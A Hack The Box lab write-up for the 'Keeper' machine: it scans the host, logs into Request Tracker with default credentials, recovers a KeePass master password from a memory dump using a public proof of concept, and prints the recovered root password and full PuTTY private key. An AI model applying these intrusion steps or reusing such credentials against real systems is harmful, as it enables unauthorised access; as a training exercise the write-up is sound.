Keeper - HacktheBox WriteUp

Keeper - HacktheBox WriteUp

Enumeration & Foothold

First, we start with a port scan & note that there is a web server running on port 80.

┌─[stitch@parrot]─[~/Desktop]
└──╼ $sudo nmap -sC -sV -p- 10.129.97.194
Starting Nmap 7.93 ( <https://nmap.org> ) at 2023-08-13 20:57 CEST
Nmap scan report for 10.129.97.194
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_  256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 47.71 seconds

When we visit this site, we find that there is a domain, keeper.htb and subdomain, tickets.keeper.htb. In this environment, we need to add these to ours hosts file.

We see that there is a Request Tracker ticketing system login page, and a quick search engine query gives us the default username & password. https://forum.bestpractical.com/t/forgot-admin-password-of-rt/33451

Default password: root:password.

User Access

Now that we are in the system, we can start looking at tickets. We find one for a new user, with the initial password.

lnorgaard (Lise Nørgaard)

We can then use that password to ssh in & get the user.txt flag from the user home folder.

Root

In the user’s home folder, we find an interesting zip file, RT30000.zip.

Copy RT30000.zip to your machine, then unzip. We get a program dump file + a keepass db. There is a vulnerability in some versions of keepass that allow an attacker to dump the master password from a memory dump. There is a proof of concept here:

https://github.com/vdohney/keepass-password-dumper

Using this script, we get the following potential password.

There are some unknown characters, but we know that Lise has their language in the ticket system set to Danish. With some googling, we find a popular Danish dessert: rødgrød med fløde that seems to fill the unknown characters. Using this as the keepass masterpass, we are able to access the database.

From here, we can find an entry for root that contains a password as well as contents for a ppk to use with PuTTY. We are unable to use the password, but we can import the ppk into putty and connect to the server that way.

root:F4><3K0nd!

PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

SSH into the machine using this private file with putty (You may need to use wine to run the latest version on Linux if you get this error: Couldn’t load private key – Putty key format too new)

https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

That’s it! We are root